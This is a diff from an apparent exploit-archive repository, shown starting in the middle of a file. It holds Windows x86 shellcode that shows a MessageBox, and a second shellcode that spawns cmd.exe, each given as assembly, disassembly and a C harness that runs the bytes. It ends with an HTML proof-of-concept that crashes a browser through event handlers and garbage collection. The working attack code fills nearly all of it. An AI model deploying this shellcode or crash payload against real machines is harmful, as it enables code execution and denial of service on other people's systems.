mov ecx,[eax+0x10] ;kernel32 base address
xor ebx,ebx
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;--------------------------------------------------
xor edx,edx
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
;-----------------------------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
;---------------------------------
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
;------------------
mov esi,edx
mov edi,ecx
;--------------------
;finding address of LoadLibraryA()
xor ebx,ebx
push ebx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ecx
call edx
add esp,16
;---------------------------
xor ecx,ecx
;LoadLibraryA("user32.dll")
push 0x42426c6c
mov [esp+2],byte cl
push 0x642e3233
push 0x72657375
push esp
call eax
;-------------------------
;Finding address of MessageBoxA()
add esp,12
xor ecx,ecx
push 0x4241786f
mov [esp+3],byte cl
push 0x42656761
push 0x7373654d
push esp
push eax
call esi
;---------------------------------
add esp,12
;----------------
;MessageBoxA(NULL,"Sample msg!!","hi There",1)
xor edx,edx
xor ecx,ecx
push edx
push 0x21216773
push 0x6d20656c
push 0x706d6153
lea edx,[esp] ; "Sample msg!!"
push ecx
push 0x65726568
push 0x54206968
lea ecx,[esp] ; "hi There"
xor ebx,ebx
inc ebx
push ebx
push edx
push ecx
xor ebx,ebx
push ebx
call eax
;----------------------
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
lea ecx,[esp]
push ecx
push edi
call esi
;---------------
xor ecx,ecx
push ecx
call eax
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x67\x21\x21\x68\x6c\x65\x20\x6d\x68\x53\x61\x6d\x70\x8d\x14\x24\x51\x68\x68\x65\x72\x65\x68\x68\x69\x20\x54\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}

328
platforms/win_x86/shellcode/40246.c Executable file
View file

@ -0,0 +1,328 @@
/*
# Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 15-08-2016
# Tested On : Windows 7 x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 31 db xor %ebx,%ebx
14: 8b 59 3c mov 0x3c(%ecx),%ebx
17: 01 cb add %ecx,%ebx
19: 8b 5b 78 mov 0x78(%ebx),%ebx
1c: 01 cb add %ecx,%ebx
1e: 8b 73 20 mov 0x20(%ebx),%esi
21: 01 ce add %ecx,%esi
23: 31 d2 xor %edx,%edx
00000025 <func>:
25: 42 inc %edx
26: ad lods %ds:(%esi),%eax
27: 01 c8 add %ecx,%eax
29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2f: 75 f4 jne 25 <func>
31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
38: 75 eb jne 25 <func>
3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
41: 75 e2 jne 25 <func>
43: 8b 73 1c mov 0x1c(%ebx),%esi
46: 01 ce add %ecx,%esi
48: 8b 14 96 mov (%esi,%edx,4),%edx
4b: 01 ca add %ecx,%edx
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 db xor %ebx,%ebx
53: 68 79 41 41 41 push $0x41414179
58: 66 89 5c 24 01 mov %bx,0x1(%esp)
5d: 68 65 6d 6f 72 push $0x726f6d65
62: 68 65 72 6f 4d push $0x4d6f7265
67: 68 52 74 6c 5a push $0x5a6c7452
6c: 54 push %esp
6d: 51 push %ecx
6e: ff d2 call *%edx
70: 83 c4 10 add $0x10,%esp
73: 31 c9 xor %ecx,%ecx
75: 89 ca mov %ecx,%edx
77: b2 54 mov $0x54,%dl
79: 51 push %ecx
7a: 83 ec 54 sub $0x54,%esp
7d: 8d 0c 24 lea (%esp),%ecx
80: 51 push %ecx
81: 52 push %edx
82: 51 push %ecx
83: ff d0 call *%eax
85: 59 pop %ecx
86: 31 d2 xor %edx,%edx
88: 68 73 41 42 42 push $0x42424173
8d: 66 89 54 24 02 mov %dx,0x2(%esp)
92: 68 6f 63 65 73 push $0x7365636f
97: 68 74 65 50 72 push $0x72506574
9c: 68 43 72 65 61 push $0x61657243
a1: 8d 14 24 lea (%esp),%edx
a4: 51 push %ecx
a5: 52 push %edx
a6: 57 push %edi
a7: ff d6 call *%esi
a9: 59 pop %ecx
aa: 83 c4 10 add $0x10,%esp
ad: 31 db xor %ebx,%ebx
af: 68 65 78 65 41 push $0x41657865
b4: 88 5c 24 03 mov %bl,0x3(%esp)
b8: 68 63 6d 64 2e push $0x2e646d63
bd: 8d 1c 24 lea (%esp),%ebx
c0: 31 d2 xor %edx,%edx
c2: b2 44 mov $0x44,%dl
c4: 89 11 mov %edx,(%ecx)
c6: 8d 51 44 lea 0x44(%ecx),%edx
c9: 56 push %esi
ca: 31 f6 xor %esi,%esi
cc: 52 push %edx
cd: 51 push %ecx
ce: 56 push %esi
cf: 56 push %esi
d0: 56 push %esi
d1: 56 push %esi
d2: 56 push %esi
d3: 56 push %esi
d4: 53 push %ebx
d5: 56 push %esi
d6: ff d0 call *%eax
d8: 5e pop %esi
d9: 83 c4 08 add $0x8,%esp
dc: 31 db xor %ebx,%ebx
de: 68 65 73 73 41 push $0x41737365
e3: 88 5c 24 03 mov %bl,0x3(%esp)
e7: 68 50 72 6f 63 push $0x636f7250
ec: 68 45 78 69 74 push $0x74697845
f1: 8d 1c 24 lea (%esp),%ebx
f4: 53 push %ebx
f5: 57 push %edi
f6: ff d6 call *%esi
f8: 31 c9 xor %ecx,%ecx
fa: 51 push %ecx
fb: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32 base address
xor ebx,ebx
mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
;---------------------------------------------
xor edx,edx
func:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz func
cmp dword [eax+4],'rocA'
jnz func
cmp dword [eax+8],'ddre'
jnz func
;--------------------------------
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
;-------------------------------------
mov esi,edx
mov edi,ecx
;-------------------------
xor ebx,ebx
;finding address of RtlZeroMemory()
push 0x41414179
mov [esp+1],word bx
push 0x726f6d65
push 0x4d6f7265
push 0x5a6c7452
push esp
push ecx
call edx
;------------------------------
add esp,16
;-----------------------------------
;zero out 84 bytes
xor ecx,ecx
mov edx,ecx
mov dl,84
push ecx
sub esp,84
lea ecx,[esp]
push ecx
push edx
push ecx
call eax
;----------------------------
;finding address of CreateProcessA()
pop ecx
xor edx,edx
push 0x42424173
mov [esp+2],word dx
push 0x7365636f
push 0x72506574
push 0x61657243
lea edx,[esp]
push ecx
push edx
push edi
call esi
;--------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)
pop ecx
add esp,16
xor ebx,ebx
push 0x41657865
mov [esp+3],byte bl
push 0x2e646d63
lea ebx,[esp]
xor edx,edx
mov dl,68
mov [ecx],edx
lea edx,[ecx+68]
push esi ;
xor esi,esi
push edx
push ecx
push esi
push esi
push esi
push esi
push esi
push esi
push ebx
push esi
call eax
pop esi
;-------------------------------------
;finding address of ExitProcess()
add esp,8
xor ebx,ebx
push 0x41737365
mov [esp+3],byte bl
push 0x636f7250
push 0x74697845
lea ebx,[esp]
push ebx
push edi
call esi
xor ecx,ecx
push ecx
call eax
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";
main()
{
printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}

21
platforms/windows/dos/40253.html Executable file
View file

@ -0,0 +1,21 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=827
-->
<script>
function eventhandler1() {
CollectGarbage();
}
function eventhandler5() {
try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
}
</script>
</noembed>
<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
</xmp>
</select>A7
<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">